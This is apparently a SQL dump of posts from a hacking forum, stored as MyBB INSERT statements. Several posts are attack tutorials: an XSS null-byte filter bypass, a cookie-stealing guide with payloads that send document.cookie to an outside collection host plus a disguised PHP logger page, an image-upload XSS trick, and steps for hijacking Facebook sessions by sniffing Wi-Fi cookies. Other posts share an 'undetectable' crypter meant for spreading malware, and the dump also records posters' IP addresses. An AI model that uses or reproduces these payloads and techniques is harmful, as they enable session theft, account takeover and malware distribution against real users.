cross site scripting vector. Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I\'ve seen this vector bypass some of the most restrictive XSS filters to date: [code]perl -e \'print \"<SCR\\0IPT>alert(\\\"XSS\\\")</SCR\\0IPT>\";\' > out[/code]', '41.174.9.29', '699271453', '0', '0', '0', '0', '1', '99939f5332b1524942a04876535c5395', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('226', '94', '223', '16', 'RE: What is this section about?', '0', '1', 't3h jok3r', '1344457141', 'Nice thread, thanks for this explanation.', '41.174.9.29', '699271453', '1', '0', '0', '0', '1', '968b71494ae13492432e0f6d0988504d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('227', '93', '221', '18', 'RE: Gmail Brute Forcer Tool', '0', '2', 'Apathy', '1344479273', 'Nice share I will probably download it later.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '82fc55a1ed262f2a3d517179b763a85a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('228', '92', '220', '15', 'RE: [FREE Leaked Download] RhinoTube || #1 Free Youtube bot||', '0', '2', 'Apathy', '1344479357', 'Thanks for the share. I will most likely download this later.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '274bddc0c56eda352310f84c0e987e7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('229', '96', '0', '30', 'FBI Tools [11 in 1]', '0', '1', 't3h jok3r', '1344546455', 'This is a package of 11 useful tools used to investigate the computer, it is used by most of the investigating agency including the FBI to inspect, hack and analyze other computers. For most of the programs, there is no need to install them, they are portable… [img]http://1.bp.blogspot.com/_BUvlLAqmDbQ/TCJVvbbXB9I/AAAAAAAAADY/ilCJUlhyU50/DINV.jpg[/img] This download includes: - ADS Locator (Alternate Data Streams) - Disc Investigator 1.4 (File-Slack-Analyze) - Historian 1.4 (Browser Analyze) - Live View 0.6 (System Analyze) - MUI Cacheview 1.00 (Registry Analyze) - Networkminer 0.85 (Network Analyze) - Regripper 2.02 (Registry Analyze) - Systemreport 2.54 (PC Analyze) - USB-History R1 (USB-Stick-Analyze) - Windows File Analyzer (File Analyze) - Winpcap 4.02 (Network) Download: [quote] http://uploading.com/files/9489eea3 [/quote]', '41.174.60.186', '699284666', '1', '0', '0', '0', '1', 'ef374f3413d63113e2f60f47fa99ff60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('230', '81', '191', '12', 'RE: [tut]How to spread your server', '0', '1', 't3h jok3r', '1344546619', 'Seems cool, but I\'m too busy these days with this website.', '41.174.60.186', '699284666', '1', '0', '0', '0', '1', '0dfb05477a5b4f7beb023845c213e3aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('231', '97', '0', '12', 'How to XSS and steal Cookies', '0', '1', 't3h jok3r', '1344546730', '## Title: What is the Cross Site Scripting attack and how to use the cookie grabbing attack. ## Written by: G0ld3n dr4g0n ## for more info contact me at g0ld3n_dr4g0n[at]hotmail[dot]it In the film we see the usual guy with dark glasses and leather jacket, hacking at the keyboard, in less than a minute he has the access codes of a login system. Science fiction? No, all true! There are various ways to attack a website. I list a few: -XSS stands for cross-site scripting -SQL-Injection, Injection of SQL commands in a site -Blind Sql-Injection -RFI or Remote File Inclusion -LFI, Local File Inclusion -DOS, short for Denial of Service -DDoS, Distributed Denial of Service -Format-string attacks [b]What is an XSS:[/b] Unlike sql injection and other attacks on web applications, are vulnerable to this attack dynamic sites and not. The attack can be accomplished on any site that presents the use of JavaScript, VBScript, ActiveX, HTML and Flash. For those unfamiliar with these languages, just think that it\'s languages and applications that run directly from your Web browser (Internet Explorer, Netscape, Mozilla Firefox, Google Chrome, etc..). Then is a vulnerability that affects web sites with low control of variables. The XSS allows you to insert code to the browser level (often JavaScript code, but also php, html, etc.) in order to modify the source code of the webpage. Then, is possible of implementation, when a website takes as input data on which performs the operations (such as the internal search engine of the site but not only). This information is usually sent to the site via URL with a HTTP post method. These data, in non-secure sites, are displayed as they were posted by users. In this way anyone can get hold of sensitive data, such as cookies. To do this we need only redirect our victim in a web page with the properly modified variables. A very important thing to say is that there are two types of XSS: Stored: in which an attacker is able to permanently modify the content of a web page, for example by entering a comment appropriately prepared for a post in a blog. Reflected: thanks to which it is possible to produce a URL that uses the vulnerable site will alter the content of the pages so not permanent and only for HTTP requests that use URLs such specially forged. This vulnerability is due to errors of programmers, who often neglect completely the validation of input information passed with HTTP requests.   The XSS exploit the operation of parameters badly declared: Take for example this page in php: [code] <? / la variabile in esame è c $var = $_GET [\'c\']; echo $var; ?> [/code] I said precisely that \'c\' is a variable that is set up and printed on the page. In URL level if we give the value \'hola\' to this variable we will get: [code] http://www.site.it/test.php?c=hola [/code]  In the written page, then we find text: hola From this we can understand that whatever value we give to c, this will be printed on the page.. and until they are words and numbers I would say everything is fine.. But if we will inject evil javascript code? Just think what would happen.. When an attacker run his code in the browser, the code will run in the security-context (or zone) for hosting the website. With this level of privilege, the code has the ability to read, edit and transmit sensitive data accessible from any browser. A user may be vulnerable to XSS could be his account stolen (stealing cookies), his browser may be redirected elsewhere or possibly have a fraud of their data through the website they are visiting. Essentially, an XSS attack undermines the \"trust\" between a user and the website in question. There are two types of cross-site scripting attacks: persistent attacks and attacks not persistent. The non-persistent attacks require a user visits a specially modified link with malicious code. Once the link is accessed, the malicious code will run inside the browser. The persistent attacks have malicious code in web pages that are hosted online for a period of time. Examples of favorite target of malicious users is the post in web mail, web chat, etc.The user who is unaware of everything does not have to click on a link in particular but simply visit the web page message containing malicious code. [b]Structure XSS:[/b] I would say that now there is one thing for sure: you must to have basic knowledge of html, js, etc to exploit this type of attack.   A typical attack, base, and known by all is the string: [code]  <script>alert(\"XSS\")</script> [/code] analyze it:   <script>: opening code in javascript with the various commands;   alert: brings up a message alert (for who does\'nt know it is a simple TextBox);   (\"XSS\"): is the string that is displayed inside of Alert, do not have to be text, but also numbers (in this case it is not necessary the use of \"\")   </script>: javascript code closed;   Now we analyze this string:    [code]<script>alert(document.cookie)</script>[/code]   <script> opening code in javascript with the various commands;   alert: pops up an alert   (document.cookie) instead of showing a string of text will display an alert with your cookie. [b]Filters:[/b] The web master take defense very easy to overcome at times, others more complicated, and here comes the fun because it takes the imagination of each one of us to bring the so much desired alert! These defenses are called \"filters\", or codes prohibiting the use of special characters. For someone less experienced may be considered completely solved, but not so! Take for example this filter: [code] <? $var = $_GET [\'c\']; $var = str_replace (\"<script>\", \"script\", $var); echo $var; ?> [/code] This will block the use of <script> and </ script>, but we should not necessarily use these. There are various types of filters, one of which is the addslashes filter, which will place a apex before each slash (the \"/\") making it useless to our code. This is the structure of the filter: [code] <? function addslashes ($var){ $var = str_replace (\'\"\', \'\\\"\', $var); $var = str_replace (\"\'\", \"\\\'\", $var); return $var; } ?> [/code] That would be inserted into a php page: [code] <? $var = $_GET [\'var\']; $var = addslashes ($var); echo $var; ?> [/code] Now you may ask. This as we overcome as we can not put any tip? A simple method would be to convert our code to ASCII. A great site for other fantastic and ingenious XSS is: www.ha.ckers.org/xss.html Now we have seen a series of commands, all harmless at first, but imagine if instead of Alert we redirect the webpage to a cookie grabber? Soon also will explain what is a cookie, how to apply it and what is the technique of cookie grabbing. continue ... [b]Persistent attacks:[/b] Many web sites have message boards, tagboards, and more where you can leave one or more messages. A registered user is usually identified with a session ID cookie, so he can leave a message and be identified. If we inject malicious JavaScript code as a message, for example, we could also compromise the cookie who will read the message. This is possible in case where the site/forum is vulnerable to XSS and injecting the command as a message visible to all: [code] <SCRIPT> document.location=‘http://attackerhost.example/cgi-bin/cookiesteal.cgi?’+document.cookie </SCRIPT> [/code] This we have just mentioned is a typical example of a persistent attack .. [b]Non-persistent attacks:[/b] Some sites offer a view instead of customizable web, for example, when we carry out a site login and receive a welcome message can display some data in the URL, then visible to all. In the URL might read something like this: [code] http://site.example/index.php?sessionid=12345678&username=yourname [/code] if a malicious user might have modified the URL properly, inserting JS code capable of stealing cookies, you may take control of an account, obviously masking the code like this: [code] http://site.example/index.php?sessionid=12345678&username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65 %6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70 %3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65 %78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F %6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64 %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73 %63%72%69%70%74%3E [/code] [b]Cookie Grabbing:[/b] Technique of cookie grabbing.. What is it and how does it apply? This technique is applicable at sites vulnerable to cross site scripting .. This vulnerability allows execution of arbitrary JavaScript code on the web application also allows the execution of malicious scripts acts to grabbing (take) cookies from the site itself... Example of malicious JavaScript code could be: [code]<script language=\"JavaScript\"> window.location=\"http://www.sitomio.net/logs.php?cooked=\"+document.cookie </script></span></p> <span style=\"color: #000000;\"> [/code] What would be the url: [code]http://www.vulnerablesite.net?Keywords=%3Cscript+language%3D%22JavaScript%22%3E+window.location%3D%22http%3A%2F%2Fwww.mysite.net%2Flogs.php%3Fcooked%3D%22%2Bdocument.cookie+%3C%2Fscript%3E [/code] What happens? We read www.vulnerablesite.net is the site vulnerable to XSS, keywords is the variable vulnerable and www.mysite.net is where the vulnerable site is redirect to grabbing the cookies, exactly in logs.php files that we create: [code] <html> <head> <title>404 Not Found</title> </head> <body> <h1>Not Found</h1> <?php $capo = \"</span><br /><span style=\"color: #000000;\"> \"; $_GET[\'data\'] = $data; //prende ciò che sta dopo \"data\" nell\'url e lo mette nella variabile \"data\" $fh = fopen(\"cookies.txt\",\'a+\'); //setta in \"fh\" le condizioni per aprire il file cookies.txt fwrite($fh, \"$data\"); //apre il file cookies.txt o lo crea se non esiste e ci scrive la variabile \"data\" fwrite($fh, \"$capo\");//va a capo fclose($fh); //chiude il file ?> <p>The requested URL was not found on this server.</p> </body> </html> [/code] As you can see, all processes are hidden, and when the page simply we will display \"The requested URL was not found on this server\", pretending a fake 404 not found, and in the cookie.txt will be saved all cookies of victims. [b]Upload XSS:[/b] Here\'s another neat trick to exploit the XSS: D We open a picture .gif with our beloved notepad and delete everything that is inside and edit it for example with this: [code]GIF89a<script>alert(“XSS”)</script>[/code] Close, save and upload the file, is will appear your alert! Here\'s what to put before the script to make sure that the image remains in its extension: -PNG = ‰PNG -GIF = GIF89a -JPG = ÿØÿà JFIF -BMP = BMFÖ As you can see we used GIF89 before the string to get the iimagine extension. Gif', '41.174.60.186', '699284666', '1', '0', '0', '0', '1', '1d6dd7790d5a8f9d774653fdddc97f4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('232', '33', '88', '20', 'RE: Heavens Crypter FUD', '0', '1', 't3h jok3r', '1344547811', 'Both links are dead.', '41.174.14.12', '699272716', '1', '0', '0', '0', '1', '0e06f15d7547dec8036e8fdf94b31591', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('233', '98', '0', '20', 'FREE UD RazorCrypter (Cracked)', '0', '1', 't3h jok3r', '1344547965', 'Hey guys, This is undetectable crypter with a update to update the version. I found this on the web, thought this would come in handy for server spreaders. link: http://www.mediafire.com/?efxlimfsgclvt0a Scann: http://vscan.novirusthanks.org/analysis/...wdC1leGU=/', '41.174.14.12', '699272716', '1', '0', '0', '0', '1', '32db8495d12b163f83e3ec8f65b963e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('234', '91', '219', '42', 'RE: Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '20', 'JakeUS', '1344827624', 'That\'s dumb, at least he did the right thing and told on himself.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'e02d7ad0d2758086b0598d1edf3c5a65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('235', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '44', 'M4573RH4X0R', '1344830641', '[quote=\'Timmy\' pid=\'175\' dateline=\'1344114849\'] Hey guys! I have been working a while on this! And I finally found a way to get free drinks out of vending machines, just by using the codes the programers and re-fillers use! You can also download it at my website http://tackyshack.blogspot.com JUST GOTO MY WEBSITE PLEASE :D Credits: Sit hacks a lot [/quote] Nice site to make some money from.', '207.172.50.206', '-810798386', '0', '0', '0', '0', '1', '1dcdea4da4221807d6138b684382353a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('236', '54', '138', '16', 'RE: [tut]How to SE McDonald', '0', '44', 'M4573RH4X0R', '1344831216', 'Thanks p420! Pretty basic but it did get the job done! (email method)', '207.172.50.206', '-810798386', '0', '0', '0', '0', '1', 'fa86c9848e83c938412040e1d8bc0f05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('237', '99', '0', '3', '[Previews added]New theme for LH', '0', '1', 't3h jok3r', '1344895893', 'I\'ve been working on a new theme for L33T Hacking for a couple of days and It\'s almost completed, hope you all like the theme. [b]Edited[/b] Upon user request, I have attached 3 screenshots of the theme. Hope you like it.', '41.174.59.185', '699284409', '1', '0', '1', '1345061238', '1', '1fefc81835a942ac652d88e02b3878fe', '0', '1345061238'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('238', '99', '237', '3', 'RE: New theme for LH', '0', '4', 'Triple H', '1344897854', 'That\'s cool. I can\'t wait for the new theme.', '41.174.59.185', '699284409', '1', '0', '0', '0', '1', '4d1bd7bda8d77923db5d6afe22b93de5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('239', '93', '221', '18', 'RE: Gmail Brute Forcer Tool', '0', '4', 'Triple H', '1344898404', 'Me too, I\'m going to download this right now.', '41.174.59.185', '699284409', '1', '0', '0', '0', '1', 'eace8f21b5949f5af31f2bf65f1dd020', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('240', '100', '0', '18', '[tut]Hack any facebook or account that use username ID and forum password', '0', '4', 'Triple H', '1344898582', '[color=#800000][u][i][b]HACK FACEBOOK OR ANY ACCOUNT USER ID AND PASSWORD ON WIFI OR LAN[/b][/i][/u][/color] [u][i][b][size=xx-large]THIS TRICK ONLY WORK ON WIFI OR LAN.[/size][/b][/i][/u] [size=large]To hack facebook or account like twitter,hi5, orkut,or anything else we have to knowledge about what software we are using for hack and how to operate them. in this hacking method we use two most popular software one is wireshark and other is mozilla. 1.wireshark:- Wireshark is a free and open-source packet , analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. 2.mozzila:- Mozilla Firefox is a free and open source web browser developed for Microsoft Windows, Mac OS X, and Linux. [/size] [size=x-large][b]STEP TO HACK[/b] :-[/size] [size=large]1.Download wireshark from [/size][url=http://adf.ly/BgCbT][u][i][b][size=large]HERE[/size].[/b][/i][/u][/url] [size=large]2.Download firefox from [/size][url=http://adf.ly/BgClt][u][i][b]HERE[/b][/i][/u][/url][size=large].( Its work on older version on mozilla only so you have to download mozilla from given link.) 3. After download both software install both in your pc. 4. After installation open wireshark and click on capture option in wireshark.[/size] [img]http://i1069.photobucket.com/albums/u477/manishtaraiya/1-1.jpg[/img] [size=large]5. select wifi or lan driver name from list( if you don\'t know which one is you wifi or lan card then tick on all interface.[/size] [img]http://i1069.photobucket.com/albums/u477/manishtaraiya/2-1.jpg[/img] [size=large]6. after that it will sniffing your network and showing packet. 7. now goto edit>find packet type datr in filter>select string>tick on packet detail>after that click on find. this will show you only datr packet.[/size] [img]http://i1069.photobucket.com/albums/u477/manishtaraiya/3-1.jpg[/img] OR [size=large]type in filter >http.cookie contains\"datr\" this will show you only datr packet.[/size] [img]http://i1069.photobucket.com/albums/u477/manishtaraiya/4-1.jpg[/img] [size=large]8.datr packet only for facebook which is used on your network if you not get any packet that means no one is using facebook on your network. 9. when you get datr packet then it show captured cookie like this. 10. now copy cookie by>right click on cookie line>copy>bytes>printable text only.[/size] [img]http://i1069.photobucket.com/albums/u477/manishtaraiya/6-1.jpg[/img] [size=large]11. paste it into notepad and separate all cookie format by clicking enter after every semicolon (;)[/size] [img]http://i1069.photobucket.com/albums/u477/manishtaraiya/95.jpg[/img] [color=#800000][size=large][u][i][b]STEP TO OPEN VICTIM FACEBOOK:-[/b][/i][/u][/size][/color] [size=large]1. Open mozilla and open this link to download add n edit cookie. [url=http://adf.ly/BgCur][u][i][b]CLICK HERE[/b][/i][/u].[/url] 2. After install restart your browser and goto tool>cookie editor(open)[/size] [img]http://i1069.photobucket.com/albums/u477/manishtaraiya/8-1.jpg[/img] [size=large]3. delete all cookie from list.[/size] [img]http://i1069.photobucket.com/albums/u477/manishtaraiya/10-1.jpg[/img] [size=large]4.open facebook.com in your browser and refresh cookie in cookie manager you got some cookie of facebook.com again delete all cookie and add new cookie. 5. the copied cookie in notepad like this { Cookie: c_user=100002448897925; datr=yfgZUBPsszXBGqtAG3-dMEqb; fr=0hCy3aDiaJZBth644.AWXSLDfVHnng2IVaZZ9DOu4dOD4; lu=Rgo8Z7mh2pe7_ABoftzhA1Vw; xs=63%3A3xXUBxzshD2eEg%3A0%3A1344408207; sub=1; p=0; presence=EM344408378EuserFA21B02448897985A2EstateFDsb2F0Et2F_5b_5dElm2FnullEuct2F1344407608BEtrFnullEtwF2273934543EatF1344408215307G344408378845CEchFDp_5f1B02448897985F1CC } NOTE:- this cookie doesn\'t work this is for tutorial purpose only 6.If you are getting more cookie list there are no problem. 7. now click on add> in name field fill c_user > in content fill 100002448897925> in host put .facebook.com >in path put / >after that click on save add all cookie in cookie manager and remember don\'t forget to add cookie in cookie manager and don\'t mistake in spelling.[/size] [img]http://i1069.photobucket.com/albums/u477/manishtaraiya/11.jpg[/img] [size=large]8.after adding all cookie close cookie manager and reload facebook page by pressing F5 or reload button.[/size]', '41.174.59.185', '699284409', '1', '0', '4', '1344898661', '1', 'cd8794fec42d20c54f80adfe23f56b80', '0', '1344898661'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('241', '101', '0', '34', '[tut]Glossy Logo', '0', '4', 'Triple H', '1344898868', '[size=medium][color=#00BFFF]Hey fellow LH members, today I\'m showing you how to make a glossyish sig/logo/text! 1.Make a new project with any background color and size you prefer. [img]http://i.imgur.com/WZiHl.png[/img] 2.Create a text with any size and colour you prefer. [img]http://i.imgur.com/f50qW.png[/img] 3.Choose the form tool and create a ellpipse over your text and fill it with white and choose opacity 30-45 just as you like.And set hard mix. [img]http://i.imgur.com/G1EAT.png[/img] 4.Reduce the 2 layers to 1 layer and delete the overstanding ellipse parts To do so choose the fill tool and choose Mode:Delete. [img]http://i.imgur.com/HWRAj.png[/img] 5.Create another, bigger ellipse and reduce the opacity and repeat step 4. [img]http://i.imgur.com/QBTLf.png[/img] Congrats. you just made a glossyish logo! Output should be something like this: [img]http://i.imgur.com/6Y3Fr.png[/img] [img]http://i.imgur.com/TP8EU.png[/img] This is my first tutorial and my english isn\'T so good so eexcuse me if not everything is perfect, thanks. I made this in hurry so the pic wasn\'T that cool but look at the other image I made before with patience.;) Credits: Tunez[/color][/size]', '41.174.59.185', '699284409', '1', '0', '1', '1345247022', '1', 'c4a997aa028b66e0a1d469d453507a6b', '0', '1345247022'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('242', '66', '157', '63', 'RE: Read this thread before you make a Request!', '0', '1', 't3h jok3r', '1344901979', 'Great guide on graphics request.', '41.174.59.185', '699284409', '1', '0', '0', '0', '1', '263cb971cf39730ec6fa6534984c9e9c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6326', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1351136908', 'True and @Ipod without you maybe LH wouldn\'t be that successful.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0edffcabf149ab2d832956dd01f55d87', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('244', '99', '237', '3', 'RE: New theme for LH', '0', '20', 'JakeUS', '1344914947', 'I like the preview so far, it\'s good looking.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '35e182584e085d9de9ffdc32310b6645', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('245', '99', '237', '3', 'RE: New theme for LH', '0', '2', 'Apathy', '1344916939', 'Any previews?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '763ce4cad0ed84eed5e5903e38e8f3dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('246', '101', '241', '34', 'RE: [tut]Glossy Logo', '0', '2', 'Apathy', '1344917062', 'Nice tutorial thanks.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '706eb76936104e30a52765c1d1065e9b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('247', '99', '245', '3', 'RE: New theme for LH', '0', '1', 't3h jok3r', '1344954336', '[quote=\'Apathy\' pid=\'245\' dateline=\'1344916939\'] Any previews? [/quote] Currently only staff can view the theme. You have to go to UCP>Edit Options>Styles>Green', '41.151.150.150', '697800342', '1', '0', '0', '0', '1', '2ea5241be2234ff928a03b7e368dade4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('248', '73', '174', '12', 'RE: |TUT| How to get any Website Login Passwords with uses SSL Encryption', '0', '50', 'sana khan', '1344955695', 'wow!!! you explained everything well here.....', '182.177.26.34', '-1229907422', '0', '0', '0', '0', '1', '5ce3b5c8517126c6d3f79508eda2c238', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('249', '103', '0', '12', '[Tutorial] Stealing Cookies With XSS', '0', '51', 'SAPBasisWorld', '1344957203', 'Stealing Cookie With XSS Author [url=http://www.sapbasisworld.com]SAP Basis World -SAP ABAP Java HANA Netweaver Basis[/url] Introduction I thought it was about time for someone to post a cookie stealing tutorial, so I decided to write one for you from the ground up. NOTE: Again... this was written to educate you on the security aspects of the following information, not to teach you how to break the law or do something stupid. Use what you learn from this to make your website more secure/use better browsing habits, not break into other websites. Background First, make sure you\'ve read these two articles because I\'m going to assume you already understand everything written in them: XSS Complete Guide All About Cookies and Security Now we need to understand a bit more about how XSS actually works before moving on. From the above article, you already know a bit of the theory behind XSS, so we\'ll get right to the code. Let\'s say a web page has a search function that uses this code: Code: <tr><td>Name</td><td><input type=\"text\" name=\"advisor_name\" value=\"\"></td></tr> We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script: Code: <script>alert(\"test\")</script> When we enter this into the search box and click search, nothing happens. Why? It\'s still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this: Code: <tr><td>Name</td><td><input type=\"text\" name=\"advisor_name\" value=\"<script>alert(\"test\")</script>\"></td></tr> Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit: Code: \"><script>alert(\"test\")</script> This should close the quotes end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying \"test\", showing us our script was executed. Keep in mind that you\'re not actually writing this data to the server (unless you\'re injecting it with a script that actually modifies the page on the server\'s end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example, Code: http://www.site.com/search.php?q=\"><script>alert(\"test\")</script> Of course, if you don\'t want the recipient to see the injection, you\'ll need to hex the query. You can do that here: Code: http://centricle.com/tools/ascii-hex/ Hexing the query of this url gives us Code: http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2 f%73%63%72%69%70%74%3e The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough. Using XSS to Steal Cookies OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies? The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file. First you\'ll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php): Code: <?php function GetIP() { if (getenv(\"HTTP_CLIENT_IP\") && 